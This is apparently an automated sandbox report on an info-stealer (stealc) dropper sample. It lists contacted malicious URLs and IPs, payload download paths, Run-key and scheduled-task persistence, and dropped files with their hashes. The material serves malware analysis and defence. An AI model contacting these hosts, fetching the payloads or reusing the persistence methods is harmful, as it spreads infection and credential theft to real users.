http://185.215.113.17/2fb6c2cc8dce150a.php.dll	stealc_default2.exe, 0000000E.00000002.2886105690.0000000000832000.00000004.00000020.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id10ResponseD	MSBuild.exe, 00000017.00000002.3053254646.0000000002B82000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.16/off/def.exe	InstallUtil.exe, 00000014.00000002.3013913479.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.3012882720.000000000077C000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	false
https://crisiwarny.store/	InstallUtil.exe, 00000014.00000002.3014718107.0000000000809000.00000004.00000020.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id5Response	MSBuild.exe, 00000017.00000002.3053254646.00000000029A1000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	MSBuild.exe, 00000017.00000002.3053254646.00000000029A1000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id15ResponseD	MSBuild.exe, 00000017.00000002.3053254646.0000000002A86000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id10Response	MSBuild.exe, 00000017.00000002.3053254646.00000000029A1000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.16/Jo89Ku7d/index.phpCOMJN	axplong.exe, 00000007.00000002.4561179734.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	false
http://html4/loose.dtd	Offnewhere.exe, 00000015.00000000.2796258598.00000000008F9000.00000002.00000001.01000000.00000014.sdmp, 1.exe, 0000001B.00000000.2881014480.0000000000F04000.00000002.00000001.01000000.0000001B.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew	MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id8Response	MSBuild.exe, 00000017.00000002.3053254646.00000000029A1000.00000004.00000800.00020000.00000000.sdmp	false
https://opinieni.store/_1	d0d468f327.exe, 00000024.00000003.3518169431.0000000001370000.00000004.00000020.00020000.00000000.sdmp, d0d468f327.exe, 00000024.00000003.3860072459.0000000001370000.00000004.00000020.00020000.00000000.sdmp, d0d468f327.exe, 00000024.00000003.3860181129.0000000001373000.00000004.00000020.00020000.00000000.sdmp, d0d468f327.exe, 00000024.00000003.3859935758.000000000136E000.00000004.00000020.00020000.00000000.sdmp, d0d468f327.exe, 00000024.00000002.3869148594.0000000001374000.00000004.00000020.00020000.00000000.sdmp, d0d468f327.exe, 00000024.00000003.3742129280.0000000001370000.00000004.00000020.00020000.00000000.sdmp, d0d468f327.exe, 00000024.00000003.3843451594.0000000001370000.00000004.00000020.00020000.00000000.sdmp	false
http://ocsp.sectigo.com0	axplong.exe, 00000007.00000002.4561179734.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	false
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.16/dobre/random.exe	axplong.exe, 00000007.00000002.4561179734.000000000108D000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT	MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	false
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	stealc_default2.exe, 0000000E.00000002.2910843085.0000000027030000.00000004.00000020.00020000.00000000.sdmp, d0d468f327.exe, 00000024.00000003.3223445453.0000000005BFB000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity	MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey	MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.16/Jo89Ku7d/index.phpncodedu	axplong.exe, 00000007.00000002.4561179734.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
1.1.1.1	unknown	Australia	13335	CLOUDFLARENETUS	false
185.215.113.36	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
104.21.95.91	unknown	United States	13335	CLOUDFLARENETUS	false
188.114.96.3	unknown	European Union	13335	CLOUDFLARENETUS	false
89.105.223.196	unknown	Netherlands	21159	NOVOSERVE-GMBH-ASFrankfurtGermanyNL	true
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
103.130.147.211	unknown	Turkey	63859	MYREPUBLIC-AS-IDPTEkaMasRepublikID	false
20.42.65.92	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
185.215.113.17	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
46.173.214.86	unknown	Russian Federation	47196	GARANT-PARK-INTERNETRU	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1543026
Start date and time:	2024-10-27 05:06:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 16m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	71
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@78/96@0/12
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 60% Number of executed functions: 133 Number of non-executed functions: 230
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Execution Graph export aborted for target axplong.exe, PID 5512 because there are no executed function
Execution Graph export aborted for target axplong.exe, PID 6132 because there are no executed function
Execution Graph export aborted for target file.exe, PID 6580 because it is empty
Execution Graph export aborted for target zxcv.exe, PID 5456 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Skipping network analysis since amount of network traffic is too extensive

Simulations

Behavior and APIs

Time	Type	Description
00:08:01	API Interceptor	22562x Sleep call for process: axplong.exe modified
00:08:16	API Interceptor	10x Sleep call for process: InstallUtil.exe modified
00:08:25	API Interceptor	2x Sleep call for process: WerFault.exe modified
00:08:34	API Interceptor	47x Sleep call for process: MSBuild.exe modified
00:08:44	API Interceptor	3743x Sleep call for process: Jurisdiction.pif modified
00:08:47	API Interceptor	1299x Sleep call for process: d0d468f327.exe modified
05:07:12	Task Scheduler	Run new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
05:08:43	Task Scheduler	Run new task: Wall path: wscript s>//B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js"
05:08:45	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 4ad48d7d65.exe C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe
05:08:57	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 25e6c25320.exe C:\Users\user\AppData\Local\Temp\1000877001\25e6c25320.exe
05:09:07	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 84d15ff2c9.exe C:\Users\user\AppData\Local\Temp\1000878001\84d15ff2c9.exe
05:09:22	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 03564c0e08.exe C:\Users\user\AppData\Local\Temp\1000879001\03564c0e08.exe
05:09:35	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 4ad48d7d65.exe C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe
05:09:54	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 25e6c25320.exe C:\Users\user\AppData\Local\Temp\1000877001\25e6c25320.exe
05:10:09	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 84d15ff2c9.exe C:\Users\user\AppData\Local\Temp\1000878001\84d15ff2c9.exe
05:10:22	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 03564c0e08.exe C:\Users\user\AppData\Local\Temp\1000879001\03564c0e08.exe
05:10:37	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run IntelDriver explorer.exe "C:\\Users\\user\\AppData\\Roaming\\Fsdisk\\Moderax\\svdhost.exe"
05:10:52	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AmdDriver C:\Users\user\AppData\Local\Alexa\Virtual\csrr.exe
05:10:58	Task Scheduler	Run new task: ServiceData4 path: C:\Users\user\AppData\Local\Temp\/service123.exe
05:11:04	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run UpsDriver C:\ProgramData\Samsung\svdhost.exe
05:11:14	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url
05:11:23	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LgAmARwZ.url

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECGDBAEHIJKKFHIEGCBGCAFIJJ

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FHCAEGCBFHJDGCBFHDAFBAFIII

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IDHIIJJJKEGIDGCBAFIJ

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	ASCII text, with very long lines (1743), with CRLF line terminators
Category:	dropped
Size (bytes):	9504
Entropy (8bit):	5.512408163813622
Encrypted:	false
SSDEEP:	192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
MD5:	1191AEB8EAFD5B2D5C29DF9B62C45278
SHA1:	584A8B78810AEE6008839EF3F1AC21FD5435B990
SHA-256:	0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
SHA-512:	86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
Malicious:	false
Reputation:	unknown
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\JDBFIIEBGCAKKEBFBAAFIIEGCF

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JDGCGHCG

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JKFIDGDHJEGIEBFHDGDG

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFCFIEHC

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\LgAmARwZ\Application.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	526848
Entropy (8bit):	7.806472978332927
Encrypted:	false
SSDEEP:	12288:NL07gVkGXreL4LV8wdljMagCkqZBtzPmmhwAoXC+YF:Nw7g6GXrnFkm1PmmBqC+YF
MD5:	26D8D52BAC8F4615861F39E118EFA28D
SHA1:	EFD5A7CCD128FFE280AF75EC8B3E465C989D9E35
SHA-256:	8521A1F4D523A2A9E7F8DDF01147E65E7F3FF54B268E9B40F91E07DC01FA148F
SHA-512:	1911A21D654E317FBA50308007BB9D56FBA2C19A545EF6DFAADE17821B0F8FC48AA041C8A4A0339BEE61CBD429852D561985E27C574ECED716B2E937AFA18733
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 26%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....E..........."...0.................. ... ....@.. .......................`............@.....................................O.... ..L....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...L.... ......................@..@.reloc.......@......................@..B........................H........(...............>..............................................6.(.....(....z.,..{....,..{....o......(........0...........s....}.....s....}.....s....}.....s....}.....s....}.....s....}......{....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}......{....s....}.....s....}.....s ...}.....s!...}.....("....{.... .....Ws#...o$....{....r...po%....{.... ......s&...o'....{.....o(....{.... (... ....s#...o$....{....r...po%....{.... ......s&...o'....{..

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_myrdx.exe_78958cee475b61d9fb40443ff9277fcf2c94a_41f75dc5_57df76a4-8a3e-4d19-a73b-9d5abdea16ed\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.6593532667700879
Encrypted:	false
SSDEEP:	96:gpwmAFlJZsHhGOoI7Rh6tQXIDcQvc6QcEVcw3cE//+HbHg/5hZAX/d5FMT2SlPkB:mCBZlI0BU/YjhzuiFvZ24IO8in
MD5:	6976D50906BA26376DC81993F238E205
SHA1:	E0250EA081AAF675269624963D784035FCAD4DFA
SHA-256:	3FFB9A349CCE2FF57AC04A434771B8102BA5F834ED112ADC2A788F32CBDE920A
SHA-512:	3C7A39C3ECDD8F4E6277E1107F977A476E6A23CB0876FE5C73F899ADBACBB8830D3B3F5A7630B60421C26AF2932DA46E97CD218D2B85BCBDE9747AB14258EAF6
Malicious:	false
Reputation:	unknown
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.4.7.5.7.0.2.0.5.7.9.0.8.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.4.7.5.7.0.2.7.1.4.1.7.0.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.7.d.f.7.6.a.4.-.8.a.3.e.-.4.d.1.9.-.a.7.3.b.-.9.d.5.a.b.d.e.a.1.6.e.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.7.e.1.e.6.8.2.-.0.4.6.a.-.4.c.c.7.-.a.5.1.2.-.b.1.b.d.a.6.e.f.8.d.9.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.m.y.r.d.x...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.6.4.-.0.0.0.1.-.0.0.1.4.-.f.4.f.8.-.0.a.d.c.2.5.2.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.0.8.8.4.8.e.e.f.5.0.d.7.7.8.f.7.b.3.4.6.d.6.2.9.6.3.b.6.7.1.1.0.0.0.0.f.f.f.f.!.0.0.0.0.c.2.e.2.4.6.b.9.1.9.7.c.1.8.d.6.d.4.0.d.9.4.7.7.a.8.e.9.a.2.d.7.4.a.8.3.b.0.e.2.!.m.y.r.d.x...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.2.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_zxcv.exe_2967439b27b493ec028c6e846a5f645e14cbe6_b94616dc_c1b59975-20be-4105-a6df-8dfa5ba3073f\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7165326463631878
Encrypted:	false
SSDEEP:	96:gUmTpF0fwpCsat0oI7Rh6tQXIDcQvc6QcEVcw3cE/H+HbHg/8BRTf3Oy1FhZAX/T:EpCopCu0BU/Aju1zuiFvZ24IO8U
MD5:	B030B3AFE8B8D2E1D784D012316B0370
SHA1:	C5307560C1FF625C2D49C8BDF650C36977B7A596
SHA-256:	5C2B601F41817B51A2373EA6F0FE92F9DD176BA9A6AE3AA3C7855B0501D9AD1B
SHA-512:	A1FC9232501DB27949A703FCB2D38E9FC846A69FF021682EDD7EED6B1C94C0D011BB287CD364A9072B30A1850F5A724A6564BDD628ABC6B817EE077BE3524144
Malicious:	false
Reputation:	unknown
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.4.7.5.6.8.7.1.1.2.5.7.2.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.4.7.5.6.8.7.9.5.6.3.2.4.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.1.b.5.9.9.7.5.-.2.0.b.e.-.4.1.0.5.-.a.6.d.f.-.8.d.f.a.5.b.a.3.0.7.3.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.4.1.c.2.9.0.b.-.4.e.0.5.-.4.8.5.e.-.a.d.e.3.-.1.0.c.b.c.4.b.5.c.1.9.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.z.x.c.v...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.r.i.n.t...E.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.f.0.-.0.0.0.1.-.0.0.1.4.-.2.2.1.2.-.7.b.d.2.2.5.2.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.0.9.c.7.0.1.5.2.1.1.1.1.7.5.9.b.d.9.b.5.0.9.9.5.7.1.c.0.3.3.d.0.0.0.0.0.9.0.4.!.0.0.0.0.d.0.7.e.3.f.d.1.0.0.c.4.2.3.6.6.2.d.b.b.3.e.d.8.5.7.1.3.f.f.7.b.8.7.c.5.2.e.6.0.!.z.x.c.v...e.x.e.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1AD8.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sun Oct 27 04:08:07 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	34390
Entropy (8bit):	1.7716003343316493
Encrypted:	false
SSDEEP:	96:5Q8sjuJt5vOGAM9gHrdi73Y3XqzqWDAFA/SMEOy9WIkWIUIIioGY3CTURLcq:Zs8KJOCcAFAAIoGY3CTURL
MD5:	8A2EDB995478277E9B45EEB563224AEA
SHA1:	2618FB4D9548EF77A1A8EAE0DF5AF5FDDBB76951
SHA-256:	1B8F14283358992790D9FD88E271155A39076C13FDC1008BACFCEBE7B39879EC
SHA-512:	33BFA956C454E799549B77B2E72E64F35EC0678164BD27FA5F55715FC2D6BE0ED80267F3ACE1692326FCD5A06A80A4D5885EC473A84B4D3608F4C2DE544CA700
Malicious:	false
Reputation:	unknown
Preview:	MDMP..a..... ..........g........................X...............N...........T.......8...........T...........@....z......................................................................................................eJ......x.......GenuineIntel............T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B56.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
